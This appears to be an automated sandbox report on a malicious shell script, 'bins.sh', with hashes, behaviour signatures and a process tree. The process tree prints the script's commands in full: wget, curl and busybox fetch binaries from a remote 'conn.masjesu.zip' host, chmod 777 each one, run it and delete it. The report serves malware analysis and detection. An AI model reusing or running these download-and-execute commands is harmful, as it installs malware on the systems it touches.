Analysis
-
max time kernel
149s -
max time network
20s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27-10-2024 10:08
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
38c016b5fafe4cb231ee103b3d469c38
-
SHA1
11bf75788a74d2c7bf1a077fb4baedebb0fbf051
-
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
-
SHA512
bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a
-
SSDEEP
192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodpid process 740 chmod 748 chmod 759 chmod -
Executes dropped EXE 3 IoCs
Processes:
07dhv1idPuMGGd8slnpLWIcvJPZiZye1jHXCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRFHe2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMGioc pid process /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH 741 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF 749 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG 760 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG -
Processes:
curlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 11 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlwgetwgetbusyboxwgetcurlbusyboxcurlbusyboxcurlpid process 765 wget 774 curl 712 wget 744 wget 747 busybox 752 wget 753 curl 755 busybox 730 curl 738 busybox 745 curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurlbusyboxwgetbusyboxwgetcurldescription ioc process File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH wget File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH curl File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF busybox File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG wget File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG curl File opened for modification /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG busybox File opened for modification /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS wget File opened for modification /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH busybox File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF wget File opened for modification /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:712 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738 -
/bin/chmodchmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵
- Executes dropped EXE
PID:741 -
/bin/rmrm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH2⤵PID:743
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747 -
/bin/chmodchmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- File and Directory Permissions Modification
PID:748 -
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵
- Executes dropped EXE
PID:749 -
/bin/rmrm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF2⤵PID:751
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755 -
/bin/chmodchmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- File and Directory Permissions Modification
PID:759 -
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵
- Executes dropped EXE
PID:760 -
/bin/rmrm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG2⤵PID:763
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:774
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df